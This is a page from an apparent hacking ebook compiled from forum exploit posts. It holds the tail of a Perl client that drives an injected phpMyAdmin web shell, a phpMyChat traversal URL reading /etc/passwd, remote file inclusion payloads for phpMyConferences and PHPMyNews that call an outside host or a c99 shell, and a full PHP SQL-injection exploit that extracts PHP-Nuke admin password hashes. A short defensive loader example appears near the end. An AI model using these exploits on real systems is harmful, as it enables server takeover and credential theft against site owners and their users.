Hacker Professional Ebook part 417 pptx


$cmd = URLEncode($cmd);
$cmd .= "\r\n"; #I know it look stupid, But trust me. it works better this way.
$http = $ARGV[1];
$http .= "helps.php?c=";
$http .= $cmd;
$socks = IO::Socket::INET->new(Proto=>'tcp', PeerAddr=>"$ip", PeerPort=>'80') or die"[-] Couldn't connect!\n";
httpcon($socks,"GET",$ip,$http,"!");
while($ans = <$socks>){
    if(($ans =~ /<\/pre>(.*)/)) { print $1; $allow = 0; }
    if($allow == 1){ print $ans;}
    if(($ans =~ /<pre>(.*)/)) {
        if($1 eq /<\/pre>/){ print $1;}
        $allow = 1;
    }
}
$allow = 0;
$ans = 'AN';
}

PHPMyAdmin Null Password Shell Injector.

Navaro(HCE)

PhpMyChat <= 0.14.5 Source Code Disclosure Vulnerability

PHP Code:
*******************************************************************************
# Title : PhpMyChat <= 0.14.5 Source Code Disclosure Vulnerability
# Author : ajann
# Dork : phpMyChat 0.14.5 , phpMyChat
# Vuln;
*******************************************************************************
[File] localization/languages.lib.php3 [/File]
[Code,1] languages.lib.php3
Error:
require("./${ChatPath}config/config.lib.php3");
require("./${ChatPath}lib/database/".C_DB_TYPE.".lib.php3");
require("./${ChatPath}lib/clean.lib.php3");
Key [:] ChatPath=[file]
Example: http://target.com/path/localization/languages.lib.php3?ChatPath= / /etc/pass wd

Black_hat_cr(HCE)

phpMyConferences <= 8.0.2 Remote File Inclusion

Code:
# phpMyConferences <= 8.0.2 Remote File Inclusion
#
# Found by mfp.c => mfp.c (at) hotmail (dot) com [email concealed] [brazil rlz]
#
# Greetz: F-117, Silver lords and for you, pri :*
################################################
#
#
# File: library.inc.php
#
# Bug:
# if (!$gloaded_modules[$image_name])
# {
#     include($lvc_modules_dir.'/'.$module_name.'.module.php');
#     $gloaded_modules[$module_name] = true;
# }
#
#
# Exploit:
#
# http://localhost/phpMyConferences_8.0.2/common/visiteurs/include/library.inc.php?lvc_modules_dir=http://attack/
#
#
# THANKS: Milw0rm,str0ke, google
#
#
###############################################
Black_hat_cr(HCE)

PHPMyNews 1.4 <= (cfg_include_dir) Remote File Include Vulnerability

CODE:
require($cfg_include_dir.'langues/'.$cfg_language.'.inc'.$cfg_ext);
require($cfg_include_dir.'database/'.$cfg_database.'.inc'.$cfg_ext);
require($cfg_include_dir.'form.inc'.$cfg_ext);
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Exploit:

Code:
[phpmynews_path]/include/disp_form.php3?cfg_include_dir=c99
[phpmynews_path]/include/disp_smileys.php3?cfg_include_dir=c99
[phpmynews_path]/include/little_news.php3?cfg_include_dir=c99
[phpmynews_path]/include/index.php3?cfg_include_dir=c99

Black_hat_cr(HCE)

PHP-Nuke <= 7.9 (Encyclopedia) Remote SQL Injection Exploit

Code:
<?
/* Neo Security Team - Exploit made by Paisterist on 2006-10-22
http://www.neosecurityteam.net */
$host="localhost";
$path="/phpnuke/";
$prefix="nuke_";
$port="80";
$fp = fsockopen($host, $port, $errno, $errstr, 30);
$data="query=fooaa&eid=foo'/**/UNION SELECT pwd as title FROM $prefix_authors WHERE '1'='1";
if ($fp) {
    $p="POST /phpnuke/modules.php?name=Encyclopedia&file=search HTTP/1.0\r\n";
    $p.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*\r\n";
    $p.="Referer: http://localhost/phpnuke/modules.php?name=Encyclopedia&file=search\r\n";
    $p.="Accept-Language: es-ar\r\n";
    $p.="Content-Type: application/x-www-form-urlencoded\r\n";
    $p.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
    $p.="Host: localhost\r\n";
    $p.="Content-Length: ".strlen($data)."\r\n";
    $p.="Pragma: no-cache\r\n";
    $p.="Connection: keep-alive\r\n\r\n";
    $p.=$data;
    fwrite($fp, $p);
    while (!feof($fp)) {
        $content .= fread($fp, 4096);
    }
    preg_match("/([a-zA-Z0-9]{32})/", $content, $matches);
    print_r($matches);
}
// ==Real Proof of Concept exploit==
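The phpMyChat, phpMyConferences and PHPMyNews advisories above all quote the same shape of bug: an include or require whose path prefix comes from a variable the script never sets itself. The following is an added example, not code from those projects or from the advisory authors, showing a hardened loader; load_module, the temporary directory and the module names are hypothetical.

```php
<?php
// Added example; function and directory names are hypothetical.
//
// Vulnerable shape quoted in the advisories above:
//   include($lvc_modules_dir.'/'.$module_name.'.module.php');
// The prefix is never initialised by the script, so with register_globals
// enabled a request parameter of the same name supplies it.

function load_module(string $baseDir, string $name, array $allowed): bool
{
    // 1. Accept only module names the application itself declared.
    if (!in_array($name, $allowed, true)) {
        return false;
    }
    // 2. Resolve symlinks and ".." and require the result to stay in $baseDir.
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $name . '.module.php');
    if ($base === false || $path === false) {
        return false;   // allowlisted name, but no such file on disk
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return false;   // resolved path escaped the module directory
    }
    require_once $path;
    return true;
}

// Constructed fixture: a throwaway module directory so the script runs offline.
$baseDir = sys_get_temp_dir() . '/demo_modules_' . getmypid();
mkdir($baseDir);
file_put_contents($baseDir . '/agenda.module.php', "<?php // empty demo module\n");

// Base directory and allowlist are fixed in code, never taken from the request.
$allowed = ['agenda', 'speakers'];
$inputs  = ['agenda', 'speakers', '../../etc/passwd', 'http://attack/'];
foreach ($inputs as $candidate) {
    $ok = load_module($baseDir, $candidate, $allowed);
    printf("%-20s %s\n", $candidate, $ok ? 'loaded' : 'rejected');
}

unlink($baseDir . '/agenda.module.php');
rmdir($baseDir);
```

Keeping allow_url_include off in php.ini additionally blocks the URL form of the include, independent of the application code.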

Date posted: 04/07/2014, 12:20